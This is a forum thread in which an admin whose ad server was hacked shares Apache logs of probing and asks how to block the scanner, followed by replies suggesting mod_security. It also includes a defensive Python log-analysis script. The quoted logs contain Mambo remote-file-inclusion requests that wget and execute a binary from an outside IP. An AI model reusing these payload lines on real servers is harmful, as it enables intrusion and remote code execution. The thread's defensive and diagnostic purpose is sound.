LinuxQuestions.org
blocking this hacker's efforts

07-17-2006, 11:57 PM   #1
Boss Hoss (Member, Registered: Sep 2003, Distribution: SuSe, Posts: 62)

I recently had to rebuild a box after being hacked. I believe the exploit was run through phpAdsNew which has since been updated. I've made it a little more difficult to find this time BUT I noticed the server was SLOW to respond tonight. So I'm looking through log files. I am seeing the search for phpAdsNew files again...as well as others. This searching slowed the server down before.

How can I block access to this IP virtual host account from IPs that do not have reverse DNS lookup results, like the ISPs do for emails sent from boxes that do not resolve?

Since this is my ad server, and very few people need to access it by domain, can I set which port is allowed to listen for this domain in my site's Apache conf file? Then I could access it with the port number I assign in the URL.

Code:
mybox:~ # nslookup 211.144.142.150
Server:         216.127.136.200
Address:        216.127.136.200#53

** server can't find 150.142.144.211.in-addr.arpa: NXDOMAIN

mybox:~ # grep 211.144.142.150 /var/log/apache2/ads-access_log
211.144.142.150 - - [17/Jul/2006:10:01:16 -0400] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:16 -0400] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:16 -0400] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:16 -0400] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:16 -0400] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:17 -0400] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:19 -0400] "POST /xmlrpc.php HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:20 -0400] "POST /blog/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:21 -0400] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:23 -0400] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:24 -0400] "POST /drupal/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:25 -0400] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:26 -0400] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:28 -0400] "POST /xmlrpc.php HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:29 -0400] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:34 -0400] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
mybox:~ # grep 211.144.142.150 /var/log/apache2/ads-error_log
[Mon Jul 17 10:01:16 2006] [error] [client 211.144.142.150] script '/srv/www/vhosts/ads/html/index2.php' not found or unable to stat
[Mon Jul 17 10:01:16 2006] [error] [client 211.144.142.150] script '/srv/www/vhosts/ads/html/index.php' not found or unable to stat
[Mon Jul 17 10:01:16 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/mambo
[Mon Jul 17 10:01:16 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/cvs
[Mon Jul 17 10:01:16 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/articles
[Mon Jul 17 10:01:17 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/cvs
[Mon Jul 17 10:01:19 2006] [error] [client 211.144.142.150] script '/srv/www/vhosts/ads/html/xmlrpc.php' not found or unable to stat
[Mon Jul 17 10:01:21 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/blog
[Mon Jul 17 10:01:22 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/blog
[Mon Jul 17 10:01:24 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/blogs
[Mon Jul 17 10:01:25 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/drupal
[Mon Jul 17 10:01:26 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/phpgroupware
[Mon Jul 17 10:01:27 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/wordpress
[Mon Jul 17 10:01:28 2006] [error] [client 211.144.142.150] script '/srv/www/vhosts/ads/html/xmlrpc.php' not found or unable to stat
[Mon Jul 17 10:01:30 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/xmlrpc
[Mon Jul 17 10:01:35 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/xmlsrv
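As an added defender-side example (not from this thread or from any poster), the scanning pattern in the log above turned into detection logic: a Python script that parses Apache access-log lines, flags requests whose query string carries a remote URL or a cmd= parameter (the remote-file-inclusion attempts shown above), and counts 400/404 probes per client IP. The sample lines are constructed with documentation addresses and a shortened request; the probe threshold is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache access-log line as in /var/log/apache2/ads-access_log above
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')
# RFI indicator: a query parameter whose value is a URL, or a cmd= parameter
# (the mosConfig_absolute_path=http://...&cmd=... pattern in the OP's log)
RFI_RE = re.compile(r'[?&][^=&]*=https?://|[?&]cmd=', re.I)

def parse(line):
    """Return dict(ip, ts, method, path, status), or None for a non-matching line."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_rfi(path):
    """True when the percent-decoded request path carries an RFI indicator."""
    return RFI_RE.search(unquote(path)) is not None

def analyze(lines, probe_threshold=3):
    """Per-IP counts of RFI hits and 400/404 probes; keeps IPs that sent any
    RFI attempt or at least probe_threshold probes (the scanning pattern)."""
    stats = defaultdict(lambda: {'rfi': 0, 'probes': 0, 'paths': set()})
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        s = stats[rec['ip']]
        if is_rfi(rec['path']):
            s['rfi'] += 1
        if rec['status'] in ('400', '404'):
            s['probes'] += 1
            s['paths'].add(rec['path'].split('?', 1)[0])
    return {ip: s for ip, s in stats.items()
            if s['rfi'] or s['probes'] >= probe_threshold}

# Constructed sample (documentation IPs, shortened request), not the OP's real log
SAMPLE_LOG = [
    '198.51.100.23 - - [17/Jul/2006:10:01:16 -0400] "GET /index2.php?option=com_content&mosConfig_absolute_path=http://203.0.113.5/x.txt?&cmd=id HTTP/1.1" 404 1057 "-" "Mozilla/4.0"',
    '198.51.100.23 - - [17/Jul/2006:10:01:19 -0400] "POST /xmlrpc.php HTTP/1.1" 404 1057 "-" "Mozilla/4.0"',
    '198.51.100.23 - - [17/Jul/2006:10:01:20 -0400] "POST /blog/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0"',
    '198.51.100.23 - - [17/Jul/2006:10:01:24 -0400] "POST /drupal/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0"',
    '192.0.2.9 - - [17/Jul/2006:10:02:00 -0400] "GET /adview.php?zoneid=3 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for ip, s in analyze(SAMPLE_LOG).items():
        print(f"{ip}: {s['rfi']} RFI attempt(s), {s['probes']} probes on {sorted(s['paths'])}")
```

Feeding the real access log through `analyze` (one line per list element) gives the same per-IP summary, which is what you would then hand to a firewall or mod_security deny rule.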
 
07-18-2006, 05:57 AM   #2
unSpawn (Moderator, Registered: May 2001, Posts: 29,415)

Quote:
How can I block access to this IP virtual host account from IPs that do not have a reverse dns lookup results, like the ISPs do for emails sent from boxes not resolving?
Reverse DNS means checking for a PTR record, which means doing lookups which, just like the Apache config directive to resolve remote hostnames, will noticeably slow down serving. I would focus on other measures like installing mod_security. If you're concerned mod_security alone isn't enough then you could check if running a reverse proxy in front of it all is a workable solution.
 
07-18-2006, 06:15 AM   #3
nx5000 (Senior Member, Registered: Sep 2005, Location: Out, Posts: 3,307)

Quote:
How can I block access to this IP virtual host account from IPs that do not have a reverse dns lookup results, like the ISPs do for emails sent from boxes not resolving?
And then some ISP had the idea to not give their customers a PTR so that these machines can't be used for spam.
Combined with your idea, these people won't have access to your machine. Not sure it's what you want.
 
07-18-2006, 02:57 PM   #4
Boss Hoss (Original Poster)

Is there a mod_security RPM for the SuSe distro?

The host account in question is an ad server, so it's only going to be called by my server, so it won't be blocked. Some of my advertisers may not be able to access the admin area if they don't have reverse lookups, but I'll take that chance for now.

So how can I lock down this virtual host tighter so it doesn't get exploited?
 
07-18-2006, 08:29 PM   #5
unSpawn (Moderator)

Quote:
is there a mod_security RPM for SuSe distro?
If you can't do that simple search yourself you shouldn't be running anything anywhere.

Quote:
so how can I lock down this virtual tighter so it doesn't get exploited?
Check out the LQ FAQ: Security references, esp. post #6 about hardening LAMP, and for instance http://www.linuxquestions.org/questi...03#post2041503 and any other thread in the Linux Security forum found by search terms like "PHP mod_security" or "PHP global" or "PHP hacked".
 
07-18-2006, 08:47 PM   #6
Boss Hoss (Original Poster)

Thank you for your snarkiness. I did search; I did not find the SuSe RPM. That doesn't mean someone hasn't created or found one that hasn't made its way up the food chain yet.
 